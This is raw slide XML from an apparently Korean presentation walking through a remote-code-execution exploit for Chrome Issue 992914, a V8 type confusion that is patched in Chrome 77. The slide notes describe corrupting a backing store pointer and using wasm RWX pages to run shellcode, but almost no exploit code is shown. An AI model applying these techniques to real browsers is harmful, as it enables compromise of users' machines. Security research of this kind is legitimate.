                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var view;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="사각형: 둥근 모서리 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B488F270-4499-4D6E-9414-3CEA0F086491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6777643" y="3768437"/>
            <a:ext cx="676102" cy="997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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6A34EB6-7277-4DEA-8231-8EDA4C418B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6777643" y="4015047"/>
            <a:ext cx="798022" cy="997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7A1A687E-5509-47A2-9767-9780272633B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3844233" y="4832464"/>
            <a:ext cx="2537538" cy="12469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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F26856B5-D0C4-46EB-9D3D-5AF54720E4B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6594764" y="1191156"/>
            <a:ext cx="1828800" cy="875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71D2778E-AD87-414E-A70D-945DA23A073B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="1"/>
            <a:endCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="6594763" y="1629127"/>
            <a:ext cx="182879" cy="2189186"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -182578"/>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71C293FC-F87A-4772-90C3-F9FDEA1B6940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="1"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="6594763" y="1629126"/>
            <a:ext cx="182879" cy="2435797"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -182578"/>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2027A89D-71E1-4072-B40B-963C6EEEE375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="1"/>
            <a:endCxn id="17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6381771" y="4064923"/>
            <a:ext cx="395872" cy="1390995"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3320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7F28F8-C284-4AAD-A19C-FBE09F2356B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7960602" y="5296329"/>
            <a:ext cx="1302063" cy="83099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defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B06030302020203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dist"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800"/>
              <a:t>After changing the backing store pointer, an error occurs during the recovery process, so change it to the right. It became dirty code.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFD1EBD6-94CA-4F72-AAE0-1251916E24F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2396518" y="2462110"/>
            <a:ext cx="1407622" cy="5232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defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B06030302020203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a:t>I modified the helper function a bit to remove the "n" postfix appended to the number meaning BigInt.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="사각형: 둥근 모서리 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52045AED-FB76-4755-AD47-3E2237B8A20D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2815244" y="3033306"/>
            <a:ext cx="565265" cy="1366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D28F193B-3C80-455E-AD41-831C3CB5F3DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2815243" y="3563350"/>
            <a:ext cx="565265" cy="1366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A94F4B54-C15A-4DF3-87B1-158036B46D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900966" y="2898085"/>
            <a:ext cx="2189507" cy="1384995"/>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a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B06030302020203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a:t>There is no code that is hard to understand overall. If you are newbie and you are curious about wasm, you can think of it as a formula to get rwx memory and write shellcode. If you want to know this formula, please refer to the following site link. There is a formula that uses DumpObjects to find wasm's rwx page. For reference, the code in “bc[]” is llvm bitcode, so you can decompile it into C code to see it. Then you will realize that there is an exported function name inside the wasm bc code. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="700">
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/AmesianX/v8_doare-helpers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="슬라이드 번호 개체 틀 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A57CD1C6-7E1D-455F-9937-144BF5168574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="날짜 개체 틀 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF408501-C3FA-41D1-AA77-C3294678C0A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8AA47B88-22B1-46B3-ACE1-8327F4C75151}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186732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962403-B5F4-4A33-9B04-6662D25D9260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611943" y="129722"/>
            <a:ext cx="1596685"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Introduce</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRP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8" y="872197"/>
            <a:ext cx="9057027"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Chrome Issue 992914 Sealed/Frozen Element Kind Type Confusion RCE Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E53ADB7-6F67-4ADE-8EFD-3367009F2E52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10003997" y="1819816"/>
            <a:ext cx="1648250" cy="4502538"/>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9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52D4D917-367A-4F57-A67C-A8CCC223BD59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446638" y="1142633"/>
            <a:ext cx="8330760" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://bugs.chromium.org/p/chromium/issues/detail?id=992914</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="그림 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7C5CB99-A770-49FA-99AD-74DCC9BCE48B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="539753" y="1819816"/>
            <a:ext cx="6756024" cy="4502537"/>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11" name="사각형: 둥근 모서리 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6795E782-1998-4198-BD56-F017B45710AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1931068" y="4710365"/>
            <a:ext cx="2135606" cy="2947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A34684EA-41A1-4EE0-89FA-0999C8CC4C9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="3"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4066674" y="4071085"/>
            <a:ext cx="5937323" cy="786667"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5607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C01D18-6597-493A-BC37-081DADD88220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7388891" y="4071084"/>
            <a:ext cx="2521991" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Although there is a 90-day disclosure deadline, ExodusIntel seems to have created an exploit by analyzing PoC.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="직사각형 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{116CB2AA-4484-4EAC-A8AF-79A20729CB25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446638" y="1407979"/>
            <a:ext cx="6567773" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://blog.exodusintel.com/2019/09/09/patch-gapping-chrome/</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="TextBox 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08D5BFD6-2AA8-411D-A68E-44536F20EAF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2855807" y="6322353"/>
            <a:ext cx="2123915" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GOOGLE PROJECT ZERO</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7C63DE6-F2BD-4569-B4C8-08C65757653B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9765363" y="6322352"/>
            <a:ext cx="2125518" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EXODUS INTELLIGENCE</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DE9C0C4-F5E8-4811-B2FF-205B67CCDF0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4559970" y="5380399"/>
            <a:ext cx="2689057" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The vulnerability has been fixed in Chrome version 77.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="사각형: 둥근 모서리 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBA07E19-60F2-4B16-AD49-6160D36BB9B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1931068" y="5619113"/>
            <a:ext cx="4325353" cy="2308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슬라이드 번호 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{887592D7-D5D8-408E-90B9-11DC9DCABAD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="날짜 개체 틀 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C55F64C-D31B-42EC-8F7F-3F618C236D3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF9BEB40-11F1-4C7B-A900-262DE1EBF5EC}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3471266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8" y="866181"/>
            <a:ext cx="11773257" cy="101566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sz="1200"/>
              <a:t>I explained all the code for the final exploit in previous chapters. Finally, here is the executable code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>The difference between running in d8.exe and running in the Chrome browser is just the setTimeout function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>It should be commented out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>The problem is that commenting also changes the padding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>Thus, exploits for d8.exe and exploits for Chrome browsers may differ in the number of paddings added.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA497E1-B000-4529-A911-08A8FFDC8F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="2682667"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Final description</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="그림 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C027CB-8238-4805-8484-52CC9BAE3837}"/>
